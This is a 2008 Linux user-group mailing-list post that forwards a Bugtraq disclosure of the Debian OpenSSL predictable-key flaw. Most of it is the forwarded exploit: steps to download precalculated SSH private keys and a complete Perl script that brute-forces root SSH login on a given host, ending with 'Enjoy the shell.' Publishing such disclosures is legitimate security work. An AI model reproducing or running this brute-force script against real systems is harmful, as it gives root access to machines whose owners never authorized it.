[COLUG] FW: Debian generated SSH-Keys working exploit
Warner Moore
wmoore at 2co.com
Thu May 15 12:59:34 EDT 2008
Here's a reality check. What a stupid mistake on Debian's part.
> -----Original Message-----
> From: mm at deadbeef.de [mailto:mm at deadbeef.de]
> Sent: Thursday, May 15, 2008 1:54 AM
> To: bugtraq at securityfocus.com
> Subject: Debian generated SSH-Keys working exploit
>
> Hi Securityfocus,
>
>
> the debian openssl issue leads that there are only 65.536
> possible ssh keys generated, cause the only entropy is the
> pid of the process generating the key.
>
>
> This leads to that the following perl script can be used with
> the precalculated ssh keys to brute force the ssh login. It
> works if such a keys is installed on a non-patched debian or
> any other system manual configured to.
>
>
> On an unpatched system, which doesn't need to be debian, do
> the following:
>
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
>
> 2. Extract it to a directory
>
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key
> with 2048 Bits, generated on an upatched debian (this is the
> key this exploit will break)
>
>
> 4. Run the perl script and give it the location to where you
> extracted the bzip2 mentioned.
>
>
> #!/usr/bin/perl
>
> my $keysPerConnect = 6;
>
> unless ($ARGV[1]) {
>
> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys
> SSHhostToTry\n";
>
> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>
> print "By mm at deadbeef.de\n";
>
> exit 0;
>
> }
>
> chdir($ARGV[0]);
>
> opendir(A, $ARGV[0]) || die("opendir");
>
> while ($_ = readdir(A)) {
>
> chomp;
>
> next unless m,^\d+$,;
>
> push(@a, $_);
>
> if (scalar(@a) > $keysPerConnect) {
>
> system("echo ".join(" ", @a)."; ssh -l root ".join(" ",
> map { "-i ".$_ } @a)." ".$ARGV[1]);
>
> @a = ();
>
> }
>
> }
>
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
>
> Regards,
>
> Markus Mueller
>
> mm at deadbeef.de
>
>
>
More information about the colug432
mailing list